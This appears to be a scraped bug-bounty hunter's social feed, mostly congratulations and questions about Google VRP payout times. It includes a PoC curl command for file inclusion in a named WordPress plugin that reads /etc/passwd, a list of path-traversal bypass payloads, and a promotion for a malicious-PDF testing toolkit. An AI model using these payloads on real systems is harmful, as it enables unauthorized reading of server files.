Tank0

Stay Sharp Dup. & info. is part of the journey 💪 @intigriti #HackWithIntigriti app.intigriti.com/profile/tank0

LFI in wordpress.org/plugins/image-… v1.1.0 PoC curl http://site/wp-content/plugins/image-export/download.php?file=/etc/passwd 1/2

Path Traversal Bypasses Null Byte Injection ../../../etc/./passwd%00.png Stripped Dot-Dot-Slash ..././..././..././e../tc..//pas../swd Multi-Stage Decoding ..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32Fpasswd Truncation Appending (4096 bytes) ../../../etc/./passwd/././././././

@japzdivino Congrats, how long it took from submission to acceptance?

Nice catch!

@where_secrets @GoogleVRP Best of luck next time, may i ask you how long it took from submission to getting this duplicate response

This feels like a fever dream. I reported a Google security vulnerability related to Gemini to @GoogleVRP, and they confirmed it’s real. I’m so proud of myself. Though it’s something small, my younger self would never believe I’d be able to do something like this. God is good

@mOhamedd7w Congrats, how long it took from submission to bounty

🔥🔥Excited to share another milestone in my cybersecurity journey!! I successfully reported a valid vulnerability through Google’s Vulnerability Reward Program (#googlevrp)!🎯 #GoogleVRP #BugBounty #BugBountyHunter #CyberSecurity #EthicalHacking #InfoSec

@adilburaksen How long do they usually take from submission to bounty? Have you experienced ai vrp before

A few weeks ago I was trying to get my first report accepted on Google VRP. Today I'm at 5 accepted reports, with 2 already fixed. Still a lot to learn, but it's nice to see the process working. #GoogleVRP #BugBounty #AppSec

@ott3rly Congrats How long it took them from submission to bounty ?

Feels good when its not expected much

@hasanfleyah Congratulations, how long did it take from submission to bounty ?

I am happy to share that I received a $9,500 reward from the Google AI VRP for discovering a sensitive Data Exfiltration vulnerability in NotebookLM. ​I identified a way to bypass context isolation using an Indirect Prompt Injection which could leak private PII/SPII #GoogleVRP

@hasanfleyah And also since you have experienced ai vrp do they take alot of time or how much in average?

A new Reward from Google!

@hasanfleyah Congratulations How long they took from submission to bounty?

☠️ Malicious PDF Generator: A PDF Security Testing Toolkit for Pentesters and Bug Bounty Hunters Generate 70+ PDF security test files to assess PDF viewers, converters, and document processing pipelines for SSRF, XXE, callback behavior, data exfiltration risks, and other security weaknesses during authorized testing. 🔗 github.com/jonaslejon/mal… #cybersecurity #pentesting #bugbounty #RedTeam #AppSec #PDFSecurity #WebSecurity #opensource

@Spandan0x50 @GoogleVRP Congrats how long do they usually take from submission to bounty paid ?

Can't disclose the bug, but this led to a Google account compromise. I’ve been active in the Google VRP for quite some time, climbed up to the top 150 globally, and it’s definitely not easy to impress the VRP panel with a report. Worth the hunt🎉 @GoogleVRP #bugbounty

@sin99xx Congrats man, is it ai product ?

;)

@_xeloxa @Hacker0x01 Always check the status of the report you got duplication for Because sometimes you will find the report has been closed as N/A Happened to me

ughhh another one of those super annoying things just happened DUPLICATE i just hope BBP didnt do something shady in the background coz honestly lots of people have been getting screwed over by BBP lately

@omespino @GoogleVRP Congrats, is it ai product ?

Another 🎉 Nice catch! from @GoogleVRP #Bugbounty

@JubaBaghdad How long they take to mark the report as a duplicate ? Is it fast or take a month or so then deciding that this is a duplicate

Google VRP Progress (Dec 2024 – Present): WAI: 11 Infeasible: 9 Duplicate: 4 Accepted: 25 Still pushing forward #BugBounty #GoogleVRP #CyberSecurity

@_MrPlanB And how long did it takes from submitting till they told you it's a duplicate? Because someone before had an accepted one for two month then they told him it's a dup. So I'm asking if they also took a while with you before closing as a dup

🙃

@_MrPlanB In ai product?

@seragaboushady @Google Why not reporting to google vrp ?

@Google Gemini team: We’ve discovered a critical functional bug affecting enterprise users in the Middle East. We have a documented PoC. Please provide a direct channel or VRP contact for secure reporting and resolution. #CyberSecurity #TechFounder

@nnwakelam Congratulations, is it Ai VRP ?